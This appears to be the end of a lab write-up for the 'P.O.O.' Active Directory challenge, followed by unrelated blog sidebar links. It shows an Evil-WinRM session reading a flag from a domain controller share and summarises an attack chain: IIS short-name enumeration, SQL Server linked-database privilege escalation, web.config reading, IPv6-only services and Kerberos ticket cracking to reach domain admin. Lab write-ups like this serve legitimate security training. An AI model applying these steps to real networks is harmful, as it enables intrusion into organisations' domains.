Directory: \\DC.intranet.poo\c$\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/15/2018 1:20 AM Administrator
d----- 3/15/2018 12:38 AM mr3ks
d----- 6/22/2022 5:21 PM p00_adm
d-r--- 11/21/2016 3:24 AM Public
*Evil-WinRM* PS C:\Users\p00_adm\Documents> type \\DC.intranet.poo\c$\users\mr3ks\desktop\flag.txt
POO{
1196ef8bc523f084ad1732a38a0851d6}
Summary
Here we are P.O.O Finally done , With a lot of help wp With the help of the , I also know and learn a lot of things I didn't know before .
Recon Part is directory enumeration , Take advantage of IIS Short name vulnerability .
Huh?! Part of it is SQL Server Raise the right , Take advantage of Linked Database Permission escalation caused by incorrect configuration of .
BackTrack Part of it is IIS Sensitive file read from the server C:\inetpub\wwwroot\web.config, utilize SQL Server Using an external extended script engine will make us another user to execute , Thus the read web.config Authority .
Foothold Part of it is that some services are not just in ipv4 Address , May be in ipv6 On , It's not just there TCP and UDP Differences in transport protocols , Sometimes you need to check ipv6 Service on .
p00ned Part of it is domain extension right , By getting Kerberos Ticket acquisition password for , Then elevate the user to domain administrator privileges , You can access the domain controller .
边栏推荐
- Time Series Data Augmentation for Deep Learning: A Survey 之论文阅读
- Event registration Apache pulsar x kubesphere online meetup hot registration
- Vidéo courte recommandée chaque semaine: Soyez sérieux en parlant de "métaunivers"
- Niuke.com string deformation
- 5分钟,客服聊天处理技巧,炉火纯青
- 谈谈数字化转型晓知识
- Oracle数据库监听文件配置
- 居家办公如何管理数据中心网络基础设施?
- Algorithm -- find and maximum length k subsequence (kotlin)
- 每周推薦短視頻:談論“元宇宙”要有嚴肅認真的態度
猜你喜欢
Easyexcel single sheet and multi sheet writing
CDGA|到底怎么才能做好数据治理呢?
如何解决独立站多渠道客户沟通难题?这款跨境电商插件一定要知道!
e的lnx为什么等于x
5 minutes, excellent customer service chat handling skills
深度学习论文阅读目标检测篇(七)中英对照版:YOLOv4《Optimal Speed and Accuracy of Object Detection》
《MATLAB 神经网络43个案例分析》:第32章 小波神经网络的时间序列预测——短时交通流量预测
Prct-1400: failed to execute getcrshome resolution
Servlet快速筑基
June 13-19, 2022 AI industry weekly (issue 102): career development
随机推荐
每周推荐短视频:谈论“元宇宙”要有严肃认真的态度
LeetCode: 240. 搜索二维矩阵 II
带文字的seekbar : 自定义progressDrawable/thumb :解决显示不全
198. 打家劫舍
PHP使用递归和非递归方式实现创建多级文件夹
如何让社交媒体成为跨境电商驱动力?这款独立站工具不能错过!
Reasons for the failure of digital transformation and the way to success
LeetCode之最长公共前缀
latex公式及表格识别
百度AI模板 获取知识理解
Niuke.com string deformation
Leetcode -- linked list
[Eureka source code analysis]
从618看京东即时零售的野心
开源一款监控数据采集器,啥都能监控
Niuke network realizes simple calculator function
The ambition of JD instant retailing from 618
Summary of medical image open source datasets (II)
NLP-D59-nlp比赛D28—我想,也好—阶段总结—心态调整
数字化转型的失败原因及成功之道